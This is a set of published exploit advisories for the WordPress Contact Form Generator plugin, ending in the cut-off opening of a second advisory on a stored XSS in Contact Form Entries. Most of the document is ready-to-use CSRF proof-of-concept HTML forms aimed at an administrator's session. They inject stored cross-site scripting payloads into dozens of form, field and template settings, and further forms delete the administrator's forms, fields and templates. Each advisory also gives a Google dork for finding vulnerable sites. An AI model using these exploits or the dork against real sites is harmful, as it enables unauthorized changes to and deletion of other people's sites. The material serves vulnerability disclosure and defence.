<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: Windows 10 + Firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copied from the 'contactformgenerator.php' file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
The issue can be exploited by sending a crafted link to a WordPress administrator who has the vulnerable plugin installed.
Form field creation: when the victim opens the sent link, a new form field is created with injected HTML / JS code,
without the victim's knowledge.
Form field update: when the victim opens the link, the form field identified by the 'id' parameter is updated
with injected HTML / JS code.
-->
<!--
================================
Field form creation [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value=">"<img src=x>" />
<input type="hidden" name="id_form" value="8" /> <!-- an existing form id value for this element -->
<input type="hidden" name="id_type" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a field" />
</form>
</body>
<!--
================================
Field form update [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="tooltip_text" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="id_form" value="3" /> <!-- an existing form id value -->
<input type="hidden" name="id_type" value="1" />
<input type="hidden" name="column_type" value="0" />
<input type="hidden" name="required" value="0" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="width" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="field_margin_top" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="7" /> <!-- field id to edit -->
<input type="submit" value="Click me for update a field" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: Windows 10 + Firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copied from the 'contactformgenerator.php' file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
The issue can be exploited by sending a crafted link to a WordPress administrator who has the vulnerable plugin installed.
Form creation: when the victim opens the sent link, a new form is created with injected HTML / JS code,
without the victim's knowledge.
Form update: when the victim opens the link, the form identified by the 'id' parameter is updated
with injected HTML / JS code.
-->
<!--
=========================
Create form [CSRF PoC]
=========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA"><img src=1><" />
<input type="hidden" name="top_text" value="xds"><img src=2><" />
<input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
<input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
<input type="hidden" name="send_text" value="Send"><img src=5><" />
<input type="hidden" name="send_new_text" value="New email"><img src=6><" />
<input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
<input type="hidden" name="form_width" value="100%"><img src=8><" />
<input type="hidden" name="id_template" value="0" />
<input type="hidden" name="email_to" value=""><img src=9><" />
<input type="hidden" name="email_bcc" value=""><img src=10><" />
<input type="hidden" name="email_subject" value=""><img src=11><" />
<input type="hidden" name="email_from" value=""><img src=12><" />
<input type="hidden" name="email_from_name" value=""><img src=13><" />
<input type="hidden" name="email_replyto" value=""><img src=14><" />
<input type="hidden" name="email_replyto_name" value=""><img src=15><" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
<input type="hidden" name="redirect_url" value=""><img src=16><" />
<input type="hidden" name="redirect_delay" value="0" />
<input type="hidden" name="send_copy_enable" value="1" />
<input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
<input type="hidden" name="shake_count" value="2" />
<input type="hidden" name="shake_distanse" value="10" />
<input type="hidden" name="shake_duration" value="300" />
<input type="hidden" name="email_info_show_referrer" value="1" />
<input type="hidden" name="email_info_show_ip" value="1" />
<input type="hidden" name="email_info_show_browser" value="1" />
<input type="hidden" name="email_info_show_os" value="1" />
<input type="hidden" name="email_info_show_sc_res" value="1" />
<input type="hidden" name="show_back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a form" />
</form>
</body>
<!--
==========================
Update form [CSRF PoC]
==========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA"><img src=1><" />
<input type="hidden" name="top_text" value="xds"><img src=2><" />
<input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
<input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
<input type="hidden" name="send_text" value="Send"><img src=5><" />
<input type="hidden" name="send_new_text" value="New email"><img src=6><" />
<input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
<input type="hidden" name="form_width" value="100%"><img src=8><" />
<input type="hidden" name="id_template" value="0" />
<input type="hidden" name="email_to" value=""><img src=9><" />
<input type="hidden" name="email_bcc" value=""><img src=10><" />
<input type="hidden" name="email_subject" value=""><img src=11><" />
<input type="hidden" name="email_from" value=""><img src=12><" />
<input type="hidden" name="email_from_name" value=""><img src=13><" />
<input type="hidden" name="email_replyto" value=""><img src=14><" />
<input type="hidden" name="email_replyto_name" value=""><img src=15><" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
<input type="hidden" name="redirect_url" value=""><img src=16><" />
<input type="hidden" name="redirect_delay" value="0" />
<input type="hidden" name="send_copy_enable" value="1" />
<input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
<input type="hidden" name="shake_count" value="2" />
<input type="hidden" name="shake_distanse" value="10" />
<input type="hidden" name="shake_duration" value="300" />
<input type="hidden" name="email_info_show_referrer" value="1" />
<input type="hidden" name="email_info_show_ip" value="1" />
<input type="hidden" name="email_info_show_browser" value="1" />
<input type="hidden" name="email_info_show_os" value="1" />
<input type="hidden" name="email_info_show_sc_res" value="1" />
<input type="hidden" name="show_back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for edit form" />
</form>
</body>
</html>
<!--
===========
TIMELINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: Windows 10 + Firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copied from the 'contactformgenerator.php' file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
The issue can be exploited by sending a crafted link to a WordPress administrator who has the vulnerable plugin installed.
Template creation: when the victim opens the sent link, a new template is created with injected HTML / JS code,
without the victim's knowledge.
Template update: when the victim opens the link, the template identified by the 'id' parameter is updated
with injected HTML / JS code.
-->
<!--
==============================
Create a template [CSRF PoC]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="xsa"><img src=x>" /> <!-- persistent form name [XSS] -->
<input type="hidden" name="published" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for add new template" />
</form>
</body>
<!--
==============================
Edit a template [CSRF PoC]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value=""><img src=x>" />
<input type="hidden" name="styles[587]" value=""><img src=x>" />
<input type="hidden" name="styles[588]" value=""><img src=x>" />
<input type="hidden" name="styles[131]" value="inherit" />
<input type="hidden" name="styles[589]" value="1" />
<input type="hidden" name="styles[629]" value="dark-thin" />
<input type="hidden" name="styles[630]" value="dark-thin" />
<input type="hidden" name="styles[627]" value="0" />
<input type="hidden" name="styles[0]" value=""><img src=x>" />
<input type="hidden" name="styles[130]" value=""><img src=x>" />
<input type="hidden" name="styles[517]" value=""><img src=x>" />
<input type="hidden" name="styles[518]" value=""><img src=x>" />
<input type="hidden" name="styles[1]" value=""><img src=x>" />
<input type="hidden" name="styles[2]" value=""><img src=x>" />
<input type="hidden" name="styles[3]" value="solid" />
<input type="hidden" name="styles[4]" value=""><img src=x>" />
<input type="hidden" name="styles[5]" value=""><img src=x>" />
<input type="hidden" name="styles[6]" value=""><img src=x>" />
<input type="hidden" name="styles[7]" value=""><img src=x>" />
<input type="hidden" name="styles[8]" value=""><img src=x>" />
<input type="hidden" name="styles[9]" value=""><img src=x>" />
<input type="hidden" name="styles[10]" value=""><img src=x>" />
<input type="hidden" name="styles[11]" value=""><img src=x>" />
<input type="hidden" name="styles[12]" value=""><img src=x>" />
<input type="hidden" name="styles[13]" value=""><img src=x>" />
<input type="hidden" name="styles[14]" value=""><img src=x>" />
<input type="hidden" name="styles[15]" value=""><img src=x>" />
<input type="hidden" name="styles[16]" value=""><img src=x>" />
<input type="hidden" name="styles[17]" value=""><img src=x>" />
<input type="hidden" name="styles[18]" value=""><img src=x>" />
<input type="hidden" name="styles[19]" value=""><img src=x>" />
<input type="hidden" name="styles[600]" value="0" />
<input type="hidden" name="styles[601]" value=""><img src=x>" />
<input type="hidden" name="styles[602]" value=""><img src=x>" />
<input type="hidden" name="styles[603]" value=""><img src=x>" />
<input type="hidden" name="styles[604]" value=""><img src=x>" />
<input type="hidden" name="styles[605]" value=""><img src=x>" />
<input type="hidden" name="styles[606]" value=""><img src=x>" />
<input type="hidden" name="styles[607]" value=""><img src=x>" />
<input type="hidden" name="styles[608]" value="solid" />
<input type="hidden" name="styles[609]" value=""><img src=x>" />
<input type="hidden" name="styles[610]" value="0" />
<input type="hidden" name="styles[611]" value=""><img src=x>" />
<input type="hidden" name="styles[612]" value=""><img src=x>" />
<input type="hidden" name="styles[613]" value=""><img src=x>" />
<input type="hidden" name="styles[614]" value=""><img src=x>" />
<input type="hidden" name="styles[615]" value=""><img src=x>" />
<input type="hidden" name="styles[616]" value=""><img src=x>" />
<input type="hidden" name="styles[617]" value="0" />
<input type="hidden" name="styles[618]" value=""><img src=x>" />
<input type="hidden" name="styles[619]" value=""><img src=x>" />
<input type="hidden" name="styles[620]" value=""><img src=x>" />
<input type="hidden" name="styles[621]" value=""><img src=x>" />
<input type="hidden" name="styles[622]" value=""><img src=x>" />
<input type="hidden" name="styles[623]" value=""><img src=x>" />
<input type="hidden" name="styles[624]" value=""><img src=x>" />
<input type="hidden" name="styles[625]" value="solid" />
<input type="hidden" name="styles[626]" value=""><img src=x>" />
<input type="hidden" name="styles[20]" value=""><img src=x>" />
<input type="hidden" name="styles[21]" value=""><img src=x>" />
<input type="hidden" name="styles[22]" value="normal" />
<input type="hidden" name="styles[23]" value="normal" />
<input type="hidden" name="styles[24]" value="none" />
<input type="hidden" name="styles[25]" value="left" />
<input type="hidden" name="styles[506]" value="inherit" />
<input type="hidden" name="styles[510]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[27]" value=""><img src=x>" />
<input type="hidden" name="styles[28]" value=""><img src=x>" />
<input type="hidden" name="styles[29]" value=""><img src=x>" />
<input type="hidden" name="styles[30]" value=""><img src=x>" />
<input type="hidden" name="styles[190]" value=""><img src=x>" />
<input type="hidden" name="styles[191]" value=""><img src=x>" />
<input type="hidden" name="styles[192]" value=""><img src=x>" />
<input type="hidden" name="styles[502]" value="left" />
<input type="hidden" name="styles[193]" value=""><img src=x>" />
<input type="hidden" name="styles[194]" value=""><img src=x>" />
<input type="hidden" name="styles[195]" value=""><img src=x>" />
<input type="hidden" name="styles[196]" value="solid" />
<input type="hidden" name="styles[197]" value=""><img src=x>" />
<input type="hidden" name="styles[198]" value=""><img src=x>" />
<input type="hidden" name="styles[199]" value="normal" />
<input type="hidden" name="styles[200]" value="normal" />
<input type="hidden" name="styles[201]" value="none" />
<input type="hidden" name="styles[202]" value="inherit" />
<input type="hidden" name="styles[511]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[203]" value=""><img src=x>" />
<input type="hidden" name="styles[204]" value=""><img src=x>" />
<input type="hidden" name="styles[205]" value=""><img src=x>" />
<input type="hidden" name="styles[206]" value=""><img src=x>" />
<input type="hidden" name="styles[215]" value=""><img src=x>" />
<input type="hidden" name="styles[216]" value=""><img src=x>" />
<input type="hidden" name="styles[217]" value=""><img src=x>" />
<input type="hidden" name="styles[218]" value=""><img src=x>" />
<input type="hidden" name="styles[31]" value=""><img src=x>" />
<input type="hidden" name="styles[32]" value=""><img src=x>" />
<input type="hidden" name="styles[33]" value="normal" />
<input type="hidden" name="styles[34]" value="normal" />
<input type="hidden" name="styles[35]" value="none" />
<input type="hidden" name="styles[36]" value="left" />
<input type="hidden" name="styles[507]" value="inherit" />
<input type="hidden" name="styles[512]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[37]" value=""><img src=x>" />
<input type="hidden" name="styles[38]" value=""><img src=x>" />
<input type="hidden" name="styles[39]" value=""><img src=x>" />
<input type="hidden" name="styles[40]" value=""><img src=x>" />
<input type="hidden" name="styles[41]" value=""><img src=x>" />
<input type="hidden" name="styles[42]" value=""><img src=x>" />
<input type="hidden" name="styles[43]" value="normal" />
<input type="hidden" name="styles[44]" value="normal" />
<input type="hidden" name="styles[509]" value="inherit" />
<input type="hidden" name="styles[46]" value=""><img src=x>" />
<input type="hidden" name="styles[47]" value=""><img src=x>" />
<input type="hidden" name="styles[48]" value=""><img src=x>" />
<input type="hidden" name="styles[49]" value=""><img src=x>" />
<input type="hidden" name="styles[505]" value="white" />
<input type="hidden" name="styles[508]" value="inherit" />
<input type="hidden" name="styles[132]" value=""><img src=x>" />
<input type="hidden" name="styles[133]" value=""><img src=x>" />
<input type="hidden" name="styles[168]" value=""><img src=x>" />
<input type="hidden" name="styles[519]" value=""><img src=x>" />
<input type="hidden" name="styles[520]" value=""><img src=x>" />
<input type="hidden" name="styles[500]" value="left" />
<input type="hidden" name="styles[501]" value="left" />
<input type="hidden" name="styles[134]" value=""><img src=x>" />
<input type="hidden" name="styles[135]" value=""><img src=x>" />
<input type="hidden" name="styles[136]" value="solid" />
<input type="hidden" name="styles[137]" value=""><img src=x>" />
<input type="hidden" name="styles[138]" value=""><img src=x>" />
<input type="hidden" name="styles[139]" value=""><img src=x>" />
<input type="hidden" name="styles[140]" value=""><img src=x>" />
<input type="hidden" name="styles[141]" value=""><img src=x>" />
<input type="hidden" name="styles[142]" value=""><img src=x>" />
<input type="hidden" name="styles[143]" value=""><img src=x>" />
<input type="hidden" name="styles[144]" value=""><img src=x>" />
<input type="hidden" name="styles[145]" value=""><img src=x>" />
<input type="hidden" name="styles[146]" value=""><img src=x>" />
<input type="hidden" name="styles[147]" value=""><img src=x>" />
<input type="hidden" name="styles[148]" value=""><img src=x>" />
<input type="hidden" name="styles[149]" value="normal" />
<input type="hidden" name="styles[150]" value="normal" />
<input type="hidden" name="styles[151]" value="none" />
<input type="hidden" name="styles[152]" value="inherit" />
<input type="hidden" name="styles[153]" value=""><img src=x>" />
<input type="hidden" name="styles[154]" value=""><img src=x>" />
<input type="hidden" name="styles[155]" value=""><img src=x>" />
<input type="hidden" name="styles[156]" value=""><img src=x>" />
<input type="hidden" name="styles[157]" value=""><img src=x>" />
<input type="hidden" name="styles[158]" value=""><img src=x>" />
<input type="hidden" name="styles[159]" value=""><img src=x>" />
<input type="hidden" name="styles[160]" value=""><img src=x>" />
<input type="hidden" name="styles[161]" value=""><img src=x>" />
<input type="hidden" name="styles[162]" value=""><img src=x>" />
<input type="hidden" name="styles[163]" value=""><img src=x>" />
<input type="hidden" name="styles[164]" value=""><img src=x>" />
<input type="hidden" name="styles[165]" value=""><img src=x>" />
<input type="hidden" name="styles[166]" value=""><img src=x>" />
<input type="hidden" name="styles[167]" value=""><img src=x>" />
<input type="hidden" name="styles[513]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[176]" value=""><img src=x>" />
<input type="hidden" name="styles[177]" value=""><img src=x>" />
<input type="hidden" name="styles[178]" value=""><img src=x>" />
<input type="hidden" name="styles[179]" value=""><img src=x>" />
<input type="hidden" name="styles[180]" value=""><img src=x>" />
<input type="hidden" name="styles[181]" value=""><img src=x>" />
<input type="hidden" name="styles[182]" value=""><img src=x>" />
<input type="hidden" name="styles[183]" value=""><img src=x>" />
<input type="hidden" name="styles[184]" value=""><img src=x>" />
<input type="hidden" name="styles[185]" value=""><img src=x>" />
<input type="hidden" name="styles[186]" value=""><img src=x>" />
<input type="hidden" name="styles[187]" value=""><img src=x>" />
<input type="hidden" name="styles[188]" value=""><img src=x>" />
<input type="hidden" name="styles[189]" value=""><img src=x>" />
<input type="hidden" name="styles[171]" value=""><img src=x>" />
<input type="hidden" name="styles[514]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[172]" value=""><img src=x>" />
<input type="hidden" name="styles[173]" value=""><img src=x>" />
<input type="hidden" name="styles[174]" value=""><img src=x>" />
<input type="hidden" name="styles[175]" value=""><img src=x>" />
<input type="hidden" name="styles[169]" value=""><img src=x>" />
<input type="hidden" name="styles[521]" value=""><img src=x>" />
<input type="hidden" name="styles[522]" value=""><img src=x>" />
<input type="hidden" name="styles[170]" value=""><img src=x>" />
<input type="hidden" name="styles[523]" value=""><img src=x>" />
<input type="hidden" name="styles[535]" value=""><img src=x>" />
<input type="hidden" name="styles[536]" value=""><img src=x>" />
<input type="hidden" name="styles[537]" value=""><img src=x>" />
<input type="hidden" name="styles[538]" value=""><img src=x>" />
<input type="hidden" name="styles[539]" value=""><img src=x>" />
<input type="hidden" name="styles[540]" value=""><img src=x>" />
<input type="hidden" name="styles[541]" value=""><img src=x>" />
<input type="hidden" name="styles[542]" value=""><img src=x>" />
<input type="hidden" name="styles[543]" value=""><img src=x>" />
<input type="hidden" name="styles[544]" value=""><img src=x>" />
<input type="hidden" name="styles[545]" value=""><img src=x>" />
<input type="hidden" name="styles[546]" value=""><img src=x>" />
<input type="hidden" name="styles[547]" value="solid" />
<input type="hidden" name="styles[548]" value=""><img src=x>" />
<input type="hidden" name="styles[549]" value=""><img src=x>" />
<input type="hidden" name="styles[550]" value=""><img src=x>" />
<input type="hidden" name="styles[551]" value=""><img src=x>" />
<input type="hidden" name="styles[524]" value=""><img src=x>" />
<input type="hidden" name="styles[525]" value=""><img src=x>" />
<input type="hidden" name="styles[526]" value="normal" />
<input type="hidden" name="styles[527]" value="normal" />
<input type="hidden" name="styles[528]" value="none" />
<input type="hidden" name="styles[529]" value="inherit" />
<input type="hidden" name="styles[530]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[531]" value=""><img src=x>" />
<input type="hidden" name="styles[532]" value=""><img src=x>" />
<input type="hidden" name="styles[533]" value=""><img src=x>" />
<input type="hidden" name="styles[534]" value=""><img src=x>" />
<input type="hidden" name="styles[91]" value=""><img src=x>" />
<input type="hidden" name="styles[50]" value=""><img src=x>" />
<input type="hidden" name="styles[212]" value="left" />
<input type="hidden" name="styles[92]" value=""><img src=x>" />
<input type="hidden" name="styles[93]" value=""><img src=x>" />
<input type="hidden" name="styles[209]" value=""><img src=x>" />
<input type="hidden" name="styles[100]" value=""><img src=x>" />
<input type="hidden" name="styles[101]" value=""><img src=x>" />
<input type="hidden" name="styles[127]" value="solid" />
<input type="hidden" name="styles[102]" value=""><img src=x>" />
<input type="hidden" name="styles[103]" value=""><img src=x>" />
<input type="hidden" name="styles[104]" value=""><img src=x>" />
<input type="hidden" name="styles[105]" value=""><img src=x>" />
<input type="hidden" name="styles[94]" value=""><img src=x>" />
<input type="hidden" name="styles[95]" value=""><img src=x>" />
<input type="hidden" name="styles[96]" value=""><img src=x>" />
<input type="hidden" name="styles[97]" value=""><img src=x>" />
<input type="hidden" name="styles[98]" value=""><img src=x>" />
<input type="hidden" name="styles[99]" value=""><img src=x>" />
<input type="hidden" name="styles[106]" value=""><img src=x>" />
<input type="hidden" name="styles[107]" value=""><img src=x>" />
<input type="hidden" name="styles[108]" value="normal" />
<input type="hidden" name="styles[109]" value="normal" />
<input type="hidden" name="styles[110]" value="none" />
<input type="hidden" name="styles[112]" value="inherit" />
<input type="hidden" name="styles[515]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[113]" value=""><img src=x>" />
<input type="hidden" name="styles[114]" value=""><img src=x>" />
<input type="hidden" name="styles[115]" value=""><img src=x>" />
<input type="hidden" name="styles[116]" value=""><img src=x>" />
<input type="hidden" name="styles[51]" value=""><img src=x>" />
<input type="hidden" name="styles[52]" value=""><img src=x>" />
<input type="hidden" name="styles[124]" value=""><img src=x>" />
<input type="hidden" name="styles[516]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[125]" value=""><img src=x>" />
<input type="hidden" name="styles[126]" value=""><img src=x>" />
<input type="hidden" name="styles[117]" value=""><img src=x>" />
<input type="hidden" name="styles[118]" value=""><img src=x>" />
<input type="hidden" name="styles[119]" value=""><img src=x>" />
<input type="hidden" name="styles[120]" value=""><img src=x>" />
<input type="hidden" name="styles[121]" value=""><img src=x>" />
<input type="hidden" name="styles[122]" value=""><img src=x>" />
<input type="hidden" name="styles[552]" value="1" />
<input type="hidden" name="styles[553]" value=""><img src=x>" />
<input type="hidden" name="styles[554]" value=""><img src=x>" />
<input type="hidden" name="styles[555]" value="normal" />
<input type="hidden" name="styles[556]" value="normal" />
<input type="hidden" name="styles[596]" value="none" />
<input type="hidden" name="styles[590]" value=""><img src=x>" />
<input type="hidden" name="styles[591]" value="solid" />
<input type="hidden" name="styles[592]" value=""><img src=x>" />
<input type="hidden" name="styles[558]" value=""><img src=x>" />
<input type="hidden" name="styles[559]" value=""><img src=x>" />
<input type="hidden" name="styles[560]" value=""><img src=x>" />
<input type="hidden" name="styles[561]" value=""><img src=x>" />
<input type="hidden" name="styles[563]" value="1" />
<input type="hidden" name="styles[562]" value="1" />
<input type="hidden" name="styles[597]" value=""><img src=x>" />
<input type="hidden" name="styles[598]" value=""><img src=x>" />
<input type="hidden" name="styles[564]" value=""><img src=x>" />
<input type="hidden" name="styles[565]" value="normal" />
<input type="hidden" name="styles[566]" value="normal" />
<input type="hidden" name="styles[594]" value="none" />
<input type="hidden" name="styles[567]" value=""><img src=x>" />
<input type="hidden" name="styles[568]" value="solid" />
<input type="hidden" name="styles[569]" value=""><img src=x>" />
<input type="hidden" name="styles[570]" value=""><img src=x>" />
<input type="hidden" name="styles[571]" value=""><img src=x>" />
<input type="hidden" name="styles[572]" value=""><img src=x>" />
<input type="hidden" name="styles[573]" value=""><img src=x>" />
<input type="hidden" name="styles[574]" value=""><img src=x>" />
<input type="hidden" name="styles[595]" value="none" />
<input type="hidden" name="styles[575]" value=""><img src=x>" />
<input type="hidden" name="styles[576]" value=""><img src=x>" />
<input type="hidden" name="styles[577]" value=""><img src=x>" />
<input type="hidden" name="styles[578]" value=""><img src=x>" />
<input type="hidden" name="styles[579]" value=""><img src=x>" />
<input type="hidden" name="styles[580]" value=""><img src=x>" />
<input type="hidden" name="styles[581]" value="normal" />
<input type="hidden" name="styles[582]" value="normal" />
<input type="hidden" name="styles[593]" value="none" />
<input type="hidden" name="styles[583]" value=""><img src=x>" />
<input type="hidden" name="styles[584]" value=""><img src=x>" />
<input type="hidden" name="styles[585]" value=""><img src=x>" />
<input type="hidden" name="styles[586]" value=""><img src=x>" />
<input type="hidden" name="styles[599]" value=""><img src=x>" />
<input type="hidden" name="styles[628]" value=""><img src=x>" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="2" /> <!-- template id to edit -->
<input type="submit" value="Click me for update template" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
==============
Description
==============
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
The issue can be exploited by sending a specially crafted link to a WordPress administrator who has the vulnerable plugin installed,
causing the victim administrator to delete a form (PoC #1), a form element (PoC #2), or an existing template (PoC #3).
-->
<!--
===============================
delete a form [CSRF PoC #1]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_search" value="" />
<!-- form id value.. -->
<input type="hidden" name="ids[]" value="2" />
<!-- end -->
<input type="hidden" name="task" value="delete" />
<input type="submit" value="Delete form(s)" />
</form>
</body>
<!--
===============================
delete a field [CSRF PoC #2]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
<input type="hidden" name="filter_form" value="3" />
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_type" value="0" />
<input type="hidden" name="filter_search" value="" />
<!-- fields ids to delete -->
<input type="hidden" name="ids[]" value="9" />
<input type="hidden" name="ids[]" value="10" />
<!-- end list -->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids[]" value="" />
<input type="submit" value="delete field(s)" />
</form>
</body>
<!--
==================================
delete a template [CSRF PoC #3]
==================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_search" value="" />
<!-- an existing template id(s) to delete -->
<input type="hidden" name="ids[]" value="1" />
<!--end-->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids[]" value="" />
<input type="submit" value="Delete template(s)" />
</form>
</body>
<!--
===========
TIME-LINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
</html>
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: gx1 <gaetano.perrone[at]secsi.io>
# Vulnerability Discovery: Gaetano Perrone
# Vendor Homepage: https://www.crmperks.com/
# Software Link: https://wordpress.org/plugins/contact-form-entries/
# Version: < 1.1.7
# Tested on: any
# References:
* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/
# Description:
Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting
# Technical Details and Exploitation:
Contact Form Entries is vulnerable to a Stored XSS in the Client IP field.
When a visitor submits a form, Contact Form Entries looks up the client IP in order to store information about the submitter:
